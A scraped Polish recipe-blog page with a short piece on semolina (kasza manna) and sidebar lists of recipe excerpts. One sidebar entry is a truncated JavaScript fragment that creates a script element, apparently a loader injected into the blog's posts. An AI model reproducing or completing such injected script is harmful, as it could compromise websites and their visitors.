KUCHENNA APTEKA #43 - KASZA MANNA
Źródło: https://www.kuchniamagdaleny.pl/2019/09/kuchenna-apteka-43-kasza-manna.html
Kasza manna zwana grysikiem to drobno zmielone ziarna pszenicy, ktore sa produktem ubocznym podczas przemialu pszenicy na make. W smaku jest lekko slodkawa i delikatna, a do tego jest lekkostrawna i szybko zaspokaja glod. Niestety jest dosc kaloryczna, dlatego nie jest wskazana w dietach odchudzajacych. Jest rowniez zdrowa - zawiera cenne witaminy oraz mineraly, choc jest najubozsza ze wszystkich ...
Najnowsze przepisy
Druga nieco inna propozycja fit makowca, którego robi się... ⇖ 7
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 21
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 13
Przepisy z bloga
Ciasta to doskonały wybór na popołudniowy podwieczorek,... ⇖ 72
Gotowanie na parze jest powszechnie uznawane za jedną z... ⇖ 125
Praktycznie każda mama doskonale wie o tym, jak trudno... ⇖ 227
Słoiki na przetwory można znaleźć w sklepach w okresie... ⇖ 259
Maj to dopiero początek sezonu na przetwory, ale już... ⇖ 380
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1824
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1197
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 716
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 698
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 491
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 488
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 470









































